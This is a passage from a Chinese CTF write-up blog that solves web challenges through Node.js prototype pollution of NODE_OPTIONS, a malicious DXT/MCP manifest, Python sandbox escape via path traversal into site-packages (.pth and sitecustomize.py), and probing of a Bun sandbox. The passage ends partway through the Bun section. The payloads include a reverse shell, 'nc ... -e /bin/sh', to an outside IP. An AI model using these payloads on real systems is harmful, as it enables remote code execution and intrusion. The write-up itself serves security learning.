class="hljs-attr">status</span>: <span class="hljs-string">&quot;checked&quot;</span>, <br>            <span class="hljs-attr">info</span>: output.<span class="hljs-title function_">trim</span>() || <span class="hljs-string">&quot;No output from system check.&quot;</span><br>        &#125;);<br>    &#125;);<br>&#125;);<br><br>app.<span class="hljs-title function_">get</span>(<span class="hljs-string">&#x27;/&#x27;</span>, <span class="hljs-function">(<span class="hljs-params">req, res</span>) =&gt;</span> &#123;<br>    res.<span class="hljs-title function_">sendFile</span>(path.<span class="hljs-title function_">join</span>(__dirname, <span class="hljs-string">&#x27;index.html&#x27;</span>));<br>&#125;);<br><br><span class="hljs-comment">// Flag 位于 /flag</span><br>app.<span class="hljs-title function_">listen</span>(<span class="hljs-number">3000</span>, <span class="hljs-string">&#x27;0.0.0.0&#x27;</span>, <span class="hljs-function">() =&gt;</span> &#123;<br>    <span class="hljs-variable language_">console</span>.<span class="hljs-title function_">log</span>(<span class="hljs-string">&#x27;Server running on port 3000&#x27;</span>);<br>&#125;);<br></code></pre></td></tr></table></figure>

<p>也就是说一个接口可以进行原型链污染，一个接口可以加载命令行进程</p>
<p>虽然禁用了<code>__proto__</code>但是<code>target[&quot;constructor&quot;][&quot;prototype&quot;] </code>同样可以访问到 Object 的原型</p>
<p>那么最终的命令执行要落在spawn上，应该如何污染？</p>
<h4 id="补充：NODE-OPTIONS和nodejs命令行选项"><a href="#补充：NODE-OPTIONS和nodejs命令行选项" class="headerlink" title="补充：NODE_OPTIONS和nodejs命令行选项"></a>补充：NODE_OPTIONS和nodejs命令行选项</h4><p><code>NODE_OPTIONS</code> 是一个极其强大的环境变量，它允许你将 Node.js 的命令行参数预设在环境里。这意味着，无论你是通过 <code>node app.js</code> 还是通过 <code>npm start</code> 启动程序，这些参数都会自动生效。</p>
<p>在安全领域（如 CTF），它是实现 RCE（远程代码执行） 的最常用跳板。</p>
<p>Node.js 命令行选项：全称与缩写对照表</p>
<table>
<thead>
<tr>
<th><strong>全称</strong></th>
<th><strong>缩写</strong></th>
<th><strong>作用说明</strong></th>
<th><strong>CTF 利用场景</strong></th>
</tr>
</thead>
<tbody><tr>
<td><code>--require</code></td>
<td><code>-r</code></td>
<td>启动前强制预加载模块。</td>
<td><strong>最高频</strong>。用于加载恶意脚本或 <code>/proc/self/environ</code>。</td>
</tr>
<tr>
<td><code>--eval</code></td>
<td><code>-e</code></td>
<td>运行字符串代码。</td>
<td>直接执行 JS 命令，不加载脚本文件。</td>
</tr>
<tr>
<td><code>--print</code></td>
<td><code>-p</code></td>
<td>运行代码并打印结果（相当于 <code>-e</code> + <code>console.log</code>）。</td>
<td>快速回显执行结果。</td>
</tr>
<tr>
<td><code>--version</code></td>
<td><code>-v</code></td>
<td>查看版本。</td>
<td>探测环境信息。</td>
</tr>
<tr>
<td><code>--interactive</code></td>
<td><code>-i</code></td>
<td>进入交互式 REPL 模式。</td>
<td>维持一个可交互的 Shell。</td>
</tr>
<tr>
<td><code>--check</code></td>
<td><code>-c</code></td>
<td>语法检查但不执行。</td>
<td>较少用于攻击，常用于调试。</td>
</tr>
</tbody></table>
<p>那么利用链就清楚了，我们需要污染NODE_OPTIONS，用-r预加载flag</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs json"><span class="hljs-punctuation">&#123;</span><span class="hljs-attr">&quot;constructor&quot;</span><span class="hljs-punctuation">:</span><span class="hljs-punctuation">&#123;</span><span class="hljs-attr">&quot;prototype&quot;</span><span class="hljs-punctuation">:</span><span class="hljs-punctuation">&#123;</span><span class="hljs-attr">&quot;NODE_OPTIONS&quot;</span><span class="hljs-punctuation">:</span><span class="hljs-string">&quot;-r /flag&quot;</span><span class="hljs-punctuation">&#125;</span><span class="hljs-punctuation">&#125;</span><span class="hljs-punctuation">&#125;</span><br></code></pre></td></tr></table></figure>

<h2 id="DXT"><a href="#DXT" class="headerlink" title="DXT"></a>DXT</h2><p>考点：恶意DXT</p>
<p>dxt是个什么文件？</p>
<p>Desktop Extensions (DXT，桌面扩展) 是一种用于打包和分发本地MCP (Model Context Protocol) 服务器的标准化格式。它类似于Chrome扩展(.crx)或VS Code扩展(.vsix)，允许用户通过单次点击安装本地MCP服务器。</p>
<p>本质上和zip差不多，实际操作可以打包一个zip然后直接改后缀名为dxt</p>
<p>结合 MCP 协议特点，后端逻辑是：接收 .dxt（实为 ZIP 包） -&gt; 解压读取 manifest.json -&gt; 根据配置拉起服务进程。<br>由于后端未对 manifest.json 中的启动命令（mcp_config）做严格的过滤校验，直接将其投入系统进程执行，导致存在任意命令执行 (RCE) 漏洞。无前端回显，需通过外带 (OOB) 获取 flag。</p>
<p>下面我们写一个恶意manifest.json</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><code class="hljs json"><span class="hljs-punctuation">&#123;</span><br>    <span class="hljs-attr">&quot;manifest_version&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;0.3&quot;</span><span class="hljs-punctuation">,</span><br>    <span class="hljs-attr">&quot;dxt_version&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;1.0&quot;</span><span class="hljs-punctuation">,</span><br>    <span class="hljs-attr">&quot;name&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;exp&quot;</span><span class="hljs-punctuation">,</span><br>    <span class="hljs-attr">&quot;display_name&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;exp&quot;</span><span class="hljs-punctuation">,</span><br>    <span class="hljs-attr">&quot;version&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;1.0.0&quot;</span><span class="hljs-punctuation">,</span><br>    <span class="hljs-attr">&quot;description&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;pwn&quot;</span><span class="hljs-punctuation">,</span><br>    <span class="hljs-attr">&quot;author&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-punctuation">&#123;</span><br>        <span class="hljs-attr">&quot;name&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;a&quot;</span><span class="hljs-punctuation">,</span><br>        <span class="hljs-attr">&quot;email&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;a@a.com&quot;</span><br>    <span class="hljs-punctuation">&#125;</span><span class="hljs-punctuation">,</span><br>    <span class="hljs-attr">&quot;server&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-punctuation">&#123;</span><br>        <span class="hljs-attr">&quot;type&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;binary&quot;</span><span class="hljs-punctuation">,</span><br>        <span class="hljs-attr">&quot;entry_point&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;server/dummy&quot;</span><span class="hljs-punctuation">,</span><br>        <span class="hljs-attr">&quot;mcp_config&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-punctuation">&#123;</span><br>            <span class="hljs-attr">&quot;command&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;sh&quot;</span><span class="hljs-punctuation">,</span><br>            <span class="hljs-attr">&quot;args&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-punctuation">[</span><br>                <span class="hljs-string">&quot;-c&quot;</span><span class="hljs-punctuation">,</span><br>                <span class="hljs-string">&quot;nc 183.66.27.22:18546 -e /bin/sh&quot;</span><br>            <span class="hljs-punctuation">]</span><br>        <span class="hljs-punctuation">&#125;</span><br>    <span class="hljs-punctuation">&#125;</span><span class="hljs-punctuation">,</span><br>    <span class="hljs-attr">&quot;tools&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-punctuation">[</span><span class="hljs-punctuation">]</span><br><span class="hljs-punctuation">&#125;</span><br></code></pre></td></tr></table></figure>

<p>压缩zip之后改后缀名上传</p>
<p><img src="https://gitee.com/bobrocket/img/raw/master/image-20260331190511502.png" srcset="/img/loading.gif" lazyload alt="image-20260331190511502"></p>
<h2 id="AutoPypy"><a href="#AutoPypy" class="headerlink" title="AutoPypy"></a>AutoPypy</h2><p>考点：python沙箱逃逸</p>
<p>一共两个功能，上传代码和运行代码，我们先来看主程序server.py</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> os<br><span class="hljs-keyword">import</span> sys<br><span class="hljs-keyword">import</span> subprocess<br><span class="hljs-keyword">from</span> flask <span class="hljs-keyword">import</span> Flask, request, render_template, jsonify<br><br>app = Flask(__name__)<br><br>BASE_DIR = os.path.dirname(os.path.abspath(__file__))<br>UPLOAD_FOLDER = os.path.join(BASE_DIR, <span class="hljs-string">&#x27;uploads&#x27;</span>)<br><br><span class="hljs-keyword">if</span> <span class="hljs-keyword">not</span> os.path.exists(UPLOAD_FOLDER):<br>    os.makedirs(UPLOAD_FOLDER)<br><br><br><span class="hljs-meta">@app.route(<span class="hljs-params"><span class="hljs-string">&#x27;/&#x27;</span></span>)</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">index</span>():<br>    <span class="hljs-keyword">return</span> render_template(<span class="hljs-string">&quot;index.html&quot;</span>)<br><br><span class="hljs-meta">@app.route(<span class="hljs-params"><span class="hljs-string">&#x27;/upload&#x27;</span>, methods=[<span class="hljs-string">&#x27;POST&#x27;</span>]</span>)</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">upload</span>():<br>    <span class="hljs-keyword">if</span> <span class="hljs-string">&#x27;file&#x27;</span> <span class="hljs-keyword">not</span> <span class="hljs-keyword">in</span> request.files:<br>        <span class="hljs-keyword">return</span> <span class="hljs-string">&#x27;No file part&#x27;</span>, <span class="hljs-number">400</span><br>    <br>    file = request.files[<span class="hljs-string">&#x27;file&#x27;</span>]<br>    filename = request.form.get(<span class="hljs-string">&#x27;filename&#x27;</span>) <span class="hljs-keyword">or</span> file.filename <span class="hljs-comment">#存在目录穿越漏洞</span><br>    <br>    save_path = os.path.join(UPLOAD_FOLDER, filename)<br>    <br>    save_dir = os.path.dirname(save_path)<br>    <span class="hljs-keyword">if</span> <span class="hljs-keyword">not</span> os.path.exists(save_dir):<br>        <span class="hljs-keyword">try</span>:<br>            os.makedirs(save_dir)<br>        <span class="hljs-keyword">except</span> OSError:<br>            <span class="hljs-keyword">pass</span><br><br>    <span class="hljs-keyword">try</span>:<br>        file.save(save_path)<br>        <span class="hljs-keyword">return</span> <span class="hljs-string">f&#x27;成功上传至: <span class="hljs-subst">&#123;save_path&#125;</span>&#x27;</span><br>    <span class="hljs-keyword">except</span> Exception <span class="hljs-keyword">as</span> e:<br>        <span class="hljs-keyword">return</span> <span class="hljs-string">f&#x27;上传失败: <span class="hljs-subst">&#123;<span class="hljs-built_in">str</span>(e)&#125;</span>&#x27;</span>, <span class="hljs-number">500</span><br><br><span class="hljs-meta">@app.route(<span class="hljs-params"><span class="hljs-string">&#x27;/run&#x27;</span>, methods=[<span class="hljs-string">&#x27;POST&#x27;</span>]</span>)</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">run_code</span>():<br>    data = request.get_json()<br>    filename = data.get(<span class="hljs-string">&#x27;filename&#x27;</span>)<br><br>    target_file = os.path.join(<span class="hljs-string">&#x27;/app/uploads&#x27;</span>, filename) <span class="hljs-comment">#执行的源码</span><br><br>    launcher_path = os.path.join(BASE_DIR, <span class="hljs-string">&#x27;launcher.py&#x27;</span>) <span class="hljs-comment">#沙箱</span><br><br>    <span class="hljs-keyword">try</span>:<br>        proc = subprocess.run(<br>            [sys.executable, launcher_path, target_file],<br>            capture_output=<span class="hljs-literal">True</span>,<br>            text=<span class="hljs-literal">True</span>,<br>            timeout=<span class="hljs-number">5</span>,<br>            cwd=BASE_DIR <br>        )<br>        <span class="hljs-keyword">return</span> jsonify(&#123;<span class="hljs-string">&quot;output&quot;</span>: proc.stdout + proc.stderr&#125;)<br>    <span class="hljs-keyword">except</span> subprocess.TimeoutExpired:<br>        <span class="hljs-keyword">return</span> jsonify(&#123;<span class="hljs-string">&quot;output&quot;</span>: <span class="hljs-string">&quot;Timeout&quot;</span>&#125;)<br><br><span class="hljs-keyword">if</span> __name__ == <span class="hljs-string">&#x27;__main__&#x27;</span>:<br>    <span class="hljs-keyword">import</span> site<br>    <span class="hljs-built_in">print</span>(<span class="hljs-string">f&quot;[*] Server started.&quot;</span>)<br>    <span class="hljs-built_in">print</span>(<span class="hljs-string">f&quot;[*] Upload Folder: <span class="hljs-subst">&#123;UPLOAD_FOLDER&#125;</span>&quot;</span>)<br>    <span class="hljs-built_in">print</span>(<span class="hljs-string">f&quot;[*] Target site-packages (Try to reach here): <span class="hljs-subst">&#123;site.getsitepackages()[<span class="hljs-number">0</span>]&#125;</span>&quot;</span>) <span class="hljs-comment">#提示！！！</span><br>    app.run(host=<span class="hljs-string">&#x27;0.0.0.0&#x27;</span>, port=<span class="hljs-number">5000</span>)<br></code></pre></td></tr></table></figure>

<p>我们再来看沙箱launcher.py</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> subprocess<br><span class="hljs-keyword">import</span> sys<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">run_sandbox</span>(<span class="hljs-params">script_name</span>):<br>    <span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;Launching sandbox...&quot;</span>)<br>    cmd = [<br>        <span class="hljs-string">&#x27;proot&#x27;</span>,<br>        <span class="hljs-string">&#x27;-r&#x27;</span>, <span class="hljs-string">&#x27;./jail_root&#x27;</span>, <span class="hljs-comment">#设置沙箱根目录</span><br>        <span class="hljs-string">&#x27;-b&#x27;</span>, <span class="hljs-string">&#x27;/bin&#x27;</span>,<br>        <span class="hljs-string">&#x27;-b&#x27;</span>, <span class="hljs-string">&#x27;/usr&#x27;</span>,<br>        <span class="hljs-string">&#x27;-b&#x27;</span>, <span class="hljs-string">&#x27;/lib&#x27;</span>,<br>        <span class="hljs-string">&#x27;-b&#x27;</span>, <span class="hljs-string">&#x27;/lib64&#x27;</span>,<br>        <span class="hljs-string">&#x27;-b&#x27;</span>, <span class="hljs-string">&#x27;/etc/alternatives&#x27;</span>,<br>        <span class="hljs-string">&#x27;-b&#x27;</span>, <span class="hljs-string">&#x27;/dev/null&#x27;</span>,<br>        <span class="hljs-string">&#x27;-b&#x27;</span>, <span class="hljs-string">&#x27;/dev/zero&#x27;</span>,<br>        <span class="hljs-string">&#x27;-b&#x27;</span>, <span class="hljs-string">&#x27;/dev/urandom&#x27;</span>,<br>        <span class="hljs-string">&#x27;-b&#x27;</span>, <span class="hljs-string">f&#x27;<span class="hljs-subst">&#123;script_name&#125;</span>:/app/run.py&#x27;</span>,<br>        <span class="hljs-string">&#x27;-w&#x27;</span>, <span class="hljs-string">&#x27;/app&#x27;</span>,<br>        <span class="hljs-string">&#x27;python3&#x27;</span>, <span class="hljs-string">&#x27;run.py&#x27;</span><br>    ]<br>    subprocess.call(cmd)<br>    <span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;ok&quot;</span>)<br><br><span class="hljs-keyword">if</span> __name__ == <span class="hljs-string">&quot;__main__&quot;</span>:<br>    script = sys.argv[<span class="hljs-number">1</span>]<br>    run_sandbox(script)<br></code></pre></td></tr></table></figure>

<p>也就是说这里的沙箱并没有禁用什么函数，但是隔离出了一个小黑屋，在里面执行代码访问不到外面的文件</p>
<h3 id="非预期：直接读"><a href="#非预期：直接读" class="headerlink" title="非预期：直接读"></a>非预期：直接读</h3><p>执行源码的地方也有目录穿越漏洞，我们直接尝试执行..&#x2F;..&#x2F;flag或者&#x2F;flag</p>
<p><img src="https://gitee.com/bobrocket/img/raw/master/image-20260507101113731.png" srcset="/img/loading.gif" lazyload alt="image-20260507101113731"></p>
<h3 id="预期解：在site-packages下写-pth"><a href="#预期解：在site-packages下写-pth" class="headerlink" title="预期解：在site-packages下写.pth"></a>预期解：在site-packages下写.pth</h3><p><code>site-packages</code> 是 Python 中用于存放第三方模块和库的标准目录。Python 在初始化阶段，会扫描 site-packages 目录下的所有 .pth 文件。如果 .pth 文件中包含以 import 开头的行，Python 会在启动过程中执行该行代码。这是一个隐蔽的 RCE（远程代码执行）点。</p>
<p>系统通过 launcher.py 调用 proot 来运行 Python 脚本。虽然 proot 限制了 &#x2F;app&#x2F;run.py 的执行环境，但 <strong>launcher.py</strong> <strong>本身是在宿主机环境运行的</strong>。 server.py 调用方式如下：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs python">proc = subprocess.run(<br>            [sys.executable, launcher_path, target_file],<br>            capture_output=<span class="hljs-literal">True</span>,<br>            text=<span class="hljs-literal">True</span>,<br>            timeout=<span class="hljs-number">5</span>,<br>            cwd=BASE_DIR <br>        )<br></code></pre></td></tr></table></figure>

<p>这意味着 sys.executable（宿主机的 Python 解释器）在启动时会加载宿主机的环境配置。</p>
<p>利用 &#x2F;upload 接口，将恶意代码写入该目录下的一个 .pth 文件中<code>../../../../../usr/local/lib/python3.10/site-packages/suny.pth</code></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> os; <span class="hljs-built_in">print</span>(os.popen(<span class="hljs-string">&#x27;cat /flag&#x27;</span>).read());<br></code></pre></td></tr></table></figure>

<p>这样随便执行一段代码就把flag带出来了</p>
<h3 id="预期解：-sitecustomize-自动加载机制"><a href="#预期解：-sitecustomize-自动加载机制" class="headerlink" title="预期解： sitecustomize 自动加载机制"></a>预期解： sitecustomize 自动加载机制</h3><p><img src="https://gitee.com/bobrocket/img/raw/master/image-20260507141846540.png" srcset="/img/loading.gif" lazyload alt="image-20260507141846540"></p>
<p>上传的 py 文件可以任意写，我们利用 sitecustomize 的自动加载机制运行代码</p>
<p>py 文件写成这样上传</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> os,sys,subprocess<br><span class="hljs-built_in">print</span>(subprocess.getoutput(<span class="hljs-string">&#x27;cat /flag 2&gt;/dev/null || cat /flag.txt 2&gt;/dev/null || cat /app/flag 2&gt;/dev/null || cat /app/flag.txt 2&gt;/dev/null&#x27;</span>)) <span class="hljs-comment"># 尝试用shell读取各种路径的flag</span><br>sys.stdout.flush();os._exit(<span class="hljs-number">0</span>)<br></code></pre></td></tr></table></figure>

<p>这里命名用 &#x2F;usr&#x2F;local&#x2F;lib&#x2F;python3.10&#x2F;site-packages&#x2F;sitecustomize.py</p>
<p>服务器启动时会 import site，顺便 import 这个包，代码就会在沙箱启动前执行</p>
<h2 id="Not-a-node"><a href="#Not-a-node" class="headerlink" title="Not a node"></a>Not a node</h2><p>以前没接触过这种js沙箱，我们完整走一遍流程</p>
<p>题目说是一个安全的js沙箱</p>
<p><img src="https://gitee.com/bobrocket/img/raw/master/image-20260507211720997.png" srcset="/img/loading.gif" lazyload alt="image-20260507211720997"></p>
<p>我们来了解一下BunEdge</p>
<p><img src="https://gitee.com/bobrocket/img/raw/master/image-20260507211904717.png" srcset="/img/loading.gif" lazyload alt="image-20260507211904717"></p>
<p>那么示例代码的语法就解释的通了，这是一种特殊的js语法规范，我们来写个helloword试试</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-keyword">export</span> <span class="hljs-keyword">default</span> &#123;<br>  <span class="hljs-keyword">async</span> <span class="hljs-title function_">fetch</span>(<span class="hljs-params">request</span>) &#123;<br>    <span class="hljs-comment">// 直接返回纯文本的 Hello World</span><br>    <span class="hljs-keyword">return</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">Response</span>(<span class="hljs-string">&quot;Hello World&quot;</span>, &#123;<br>      <span class="hljs-attr">headers</span>: &#123; <span class="hljs-string">&quot;Content-Type&quot;</span>: <span class="hljs-string">&quot;text/plain&quot;</span> &#125;<br>    &#125;);<br>  &#125;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>下面我们尝试直接用Bun内置的Bun.file() API读flag</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-keyword">export</span> <span class="hljs-keyword">default</span> &#123;<br>  <span class="hljs-keyword">async</span> <span class="hljs-title function_">fetch</span>(<span class="hljs-params">request</span>) &#123;<br>    <span class="hljs-comment">// 直接读取当前目录下的 flag 文件（假设文件名叫 flag）</span><br>    <span class="hljs-keyword">const</span> flagFile = <span class="hljs-title class_">Bun</span>.<span class="hljs-title function_">file</span>(<span class="hljs-string">&#x27;./flag&#x27;</span>);<br>    <br>    <span class="hljs-comment">// 将文件内容作为响应直接返回</span><br>    <span class="hljs-keyword">return</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">Response</span>(flagFile, &#123;<br>      <span class="hljs-attr">headers</span>: &#123; <span class="hljs-string">&quot;Content-Type&quot;</span>: <span class="hljs-string">&quot;text/plain&quot;</span> &#125;<br>    &#125;);<br>  &#125;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>部署失败，Bun.file被禁用了。好吧，确实很氨醛</p>
<p><img src="https://gitee.com/bobrocket/img/raw/master/image-20260507212449564.png" srcset="/img/loading.gif" lazyload alt="image-20260507212449564"></p>
<p>我们去看看右侧的提示，在工具函数里面有一个<code>__runtime</code>，我们去了解一下</p>
<p><img src="https://gitee.com/bobrocket/img/raw/master/image-20260507213448091.png" srcset="/img/loading.gif" lazyload alt="image-20260507213448091"></p>
<p>我们看看<code>__runtime</code>下面有什么可用的属性</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-keyword">export</span> <span class="hljs-keyword">default</span> &#123;<br>    <span class="hljs-keyword">async</span> <span class="hljs-title function_">fetch</span>(<span class="hljs-params">req</span>) &#123;<br>        <span class="hljs-keyword">let</span> runtime = (<span class="hljs-number">0</span>, <span class="hljs-built_in">eval</span>)(<span class="hljs-string">&quot;this&quot;</span>).<span class="hljs-property">__runtime</span>;<br><br>        <span class="hljs-comment">// 列出所有自身属性（包括 _internal / _secrets / _debug）</span><br>        <span class="hljs-keyword">let</span> allKeys = <span class="hljs-title class_">Object</span>.<span class="hljs-title function_">getOwnPropertyNames</span>(runtime);<br><br>        <span class="hljs-keyword">return</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">Response</span>(<span class="hljs-title class_">JSON</span>.<span class="hljs-title function_">stringify</span>(allKeys));<br>    &#125;<br>&#125;;<br><br><span class="hljs-comment">//[&quot;hash&quot;,&quot;strlen&quot;,&quot;platform&quot;,&quot;perf&quot;,&quot;encoding&quot;,&quot;_debug&quot;,&quot;_secrets&quot;,&quot;_internal&quot;]</span><br></code></pre></td></tr></table></figure>

<p>可以发现runtime中<code>&quot;_debug&quot; &quot;_secrets&quot; &quot;_internal&quot;</code>这三个比较可疑，分别列出其中可用函数</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-keyword">export</span> <span class="hljs-keyword">default</span> &#123;<br>    <span class="hljs-keyword">async</span> <span class="hljs-title function_">fetch</span>(<span class="hljs-params">req</span>) &#123;<br>        <span class="hljs-keyword">let</span> s = __runtime.<span class="hljs-property">_secrets</span>;<br><br>        <span class="hljs-comment">// 看 _secrets 下有哪些函数/属性</span><br>        <span class="hljs-keyword">let</span> keys = <span class="hljs-title class_">Object</span>.<span class="hljs-title function_">getOwnPropertyNames</span>(s);<br><br>        <span class="hljs-keyword">return</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">Response</span>(<span class="hljs-title class_">JSON</span>.<span class="hljs-title function_">stringify</span>(keys));<br>    &#125;<br>&#125;;<br><br><span class="hljs-comment">/******</span><br><span class="hljs-comment">_debug : [&quot;enabled&quot;,&quot;trace&quot;,&quot;dump&quot;,&quot;inspect&quot;]</span><br><span class="hljs-comment">_secrets : [&quot;get&quot;,&quot;list&quot;]</span><br><span class="hljs-comment">_internal : [&quot;debug&quot;,&quot;lib&quot;] ******/</span><br></code></pre></td></tr></table></figure>

<p>接着向下探测，发现lib下面有个symbols</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-keyword">export</span> <span class="hljs-keyword">default</span> &#123;<br>    <span class="hljs-keyword">async</span> <span class="hljs-title function_">fetch</span>(<span class="hljs-params">req</span>) &#123;<br>        <span class="hljs-keyword">let</span> s = __runtime.<span class="hljs-property">_internal</span>.<span class="hljs-property">lib</span>.<span class="hljs-property">symbols</span>;<br>        <span class="hljs-keyword">let</span> keys = <span class="hljs-title class_">Object</span>.<span class="hljs-title function_">getOwnPropertyNames</span>(s);<br>        <span class="hljs-keyword">return</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">Response</span>(<span class="hljs-title class_">JSON</span>.<span class="hljs-title function_">stringify</span>(keys));<br>    &#125;<br>&#125;;<br><span class="hljs-comment">//回显</span><br><span class="hljs-comment">//[&quot;_0x72656164&quot;,&quot;_0x6c697374&quot;]</span><br></code></pre></td></tr></table></figure>

<p>0x72656164就是read啊，我们尝试用它读文件</p>
